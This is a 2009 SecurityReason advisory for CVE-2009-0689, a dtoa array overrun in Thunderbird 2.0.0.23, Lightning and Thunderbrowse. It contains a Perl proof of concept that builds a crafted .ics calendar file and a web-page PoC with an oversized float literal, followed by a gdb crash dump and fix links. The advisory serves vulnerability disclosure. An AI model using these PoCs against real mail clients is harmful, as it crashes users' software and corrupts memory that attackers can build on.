[ Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code
execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Thunderbird 2.0.0.23

Fixed in:
- Thunderbird 3.0
- Thunderbird 2.0.0.24pre

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/78


--- 0.Description ---
Thunderbird 2 includes many new features to help you manage your inbox.
With Thunderbird 2, it?s easier to prioritize and find your important
email with tags and the new find bar helps you find content within your
email faster.
Lightning brings the Sunbird calendar to the popular email client,
Mozilla Thunderbird. Since it's an extension, Lightning is tightly
integrated with Thunderbird, allowing it to easily perform email-related
calendaring tasks.


--- 1. Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code
execution) ---
The main problem exist in dtoa implementation. Thunderbird has the same
dtoa as Firefox, etc. This problem affects many additional Add-ons for
thunderbird.

Example for affected Add-ons:
- Lightning 0.9
- Thunderbrowse 3.2.6.7
- more

and it is the same like SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.


--- 2. Proof of Concept  (PoC) ---

(PoC for Lightning )
-----------------------
#!/usr/bin/perl
# SecurityReason.com
# sp3x
# tested on WinXp SP3

my $header = "BEGIN:VCALENDAR\n".
"PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n".
"VERSION:2.0\n".
"BEGIN:VTIMEZONE\n".
"TZID:Europe/Prague\n".
"X-LIC-LOCATION:Europe/Prague\n".
"BEGIN:DAYLIGHT\n".
"TZOFFSETFROM:+0100\n".
"TZOFFSETTO:+0200\n".
"TZNAME:CEST\n".
"DTSTART:19700329T020000\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n".
"END:DAYLIGHT\n".
"BEGIN:STANDARD\n".
"TZOFFSETFROM:+0200\n".
"TZOFFSETTO:+0100\n".
"TZNAME:CET\n".
"DTSTART:19701025T030000\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n".
"END:STANDARD\n".
"END:VTIMEZONE\n".
"BEGIN:VEVENT\n".
"CREATED:20091117T095214Z\n".
"LAST-MODIFIED:20091117T095217Z\n".
"DTSTAMP:20091117T095214Z\n".
"UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n";
my $s = "SUMMARY:0.";
my $expl = "1" x 296450;
my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T110000\n".
"DTEND;TZID=Europe/Prague:20100111T120000\n".
"END:VEVENT\n".
"END:VCALENDAR\n";

open(myfile,'>>test.ics');
print myfile $header.$s.$expl.$footer;
-----------------------

(PoC for Thunderbrowse )
-----------------------
<script>
var a=0.<?php echo str_repeat("1",333333); ?>;
</script>
-----------------------

When we use Thunderbrowse to see this site, Thunderbird will crash with:

Program terminated with signal 11, Segmentation fault.
#0  0xbb15d1e7 in ?? ()

eax            0x0      0
ecx            0xa      10
edx            0x0      0
ebx            0xbb16eb38       -1156125896
esp            0xbfbfce58       0xbfbfce58
ebp            0xbfbfce74       0xbfbfce74
esi            0xb      11
edi            0xb768e700       -1217861888
eip            0xbb15d1e7       0xbb15d1e7
eflags         0x282    [ SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0xab     171
gs             0xb3     179

(gdb) x/x ($eip)
0xbb15d1e7:     Cannot access memory at address 0xbb15d1e7
(gdb) x/x ($esi)
0xb:    Cannot access memory at address 0xb
(gdb) x/x ($edi)
0xb768e700:     0x1c71c71c

now esi=0xb and edi=0x1c71c71c

(gdb) x/20x ($edi)
0xb768e700:     0x1c71c71c      0xc71c71c7      0x71c71c71      0x1c71c71c
0xb768e710:     0xc71c71c7      0x71c71c71      0x1c71c71c      0xc71c71c7
0xb768e720:     0x71c71c71      0x1c71c71c      0xc71c71c7      0x71c71c71
0xb768e730:     0x1c71c71c      0xc71c71c7      0x71c71c71      0x1c71c71c
0xb768e740:     0xc71c71c7      0x71c71c71      0x1c71c71c      0xc71c71c7

(gdb) x/50x ($edi)+37000
0xb7697788:     0xc71c71c7      0x71c71c71      0x1c71c71c      0xc71c71c7
0xb7697798:     0x71c71c71      0x1c71c71c      0xc71c71c7      0x71c71c71
0xb76977a8:     0x1c71c71c      0xc71c71c7      0x71c71c71      0x1c71c71c
0xb76977b8:     0xc71c71c7      0x71c71c71      0x1c71c71c      0xc71c71c7
0xb76977c8:     0x71c71c71      0x1c71c71c      0xc71c71c7      0x71c71c71
0xb76977d8:     0x1c71c71c      0xc71c71c7      0x71c71c71      0x1c71c71c
0xb76977e8:     0xc71c71c7      0x91c71c71      0x0b76d741      0x1af63420
0xb76977f8:     0x7c6568c4      0xd74952a1      0x552d1c87      0x4018081a
0xb7697808:     0xcb313ca6      0xd16c5484      0x36d13467      0x130c4b7d
0xb7697818:     0x92c1d06c      0xf70d9591      0x56bea87c      0x7c7bcc44
0xb7697828:     0xe6dd415d      0x210c53a8      0x482d162b      0x6d39c1c9
0xb7697838:     0x478f5fb2      0x9d6a2f46      0xe8b20d52      0xb012aa49
0xb7697848:     0xd75822f6      0x83ebbe5a


--- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock

This list is not yet closed.


--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


--- 5. Credits ---
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.


--- 6. Greets ---
Infospec p_e_a pi3


--- 7. Contact ---
Email:
- cxib {a.t] securityreason [d0t} com
- sp3x {a.t] securityreason [d0t} com

GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- http://securityreason.com/key/sp3x.gpg

http://securityreason.com/
http://securityreason.pl/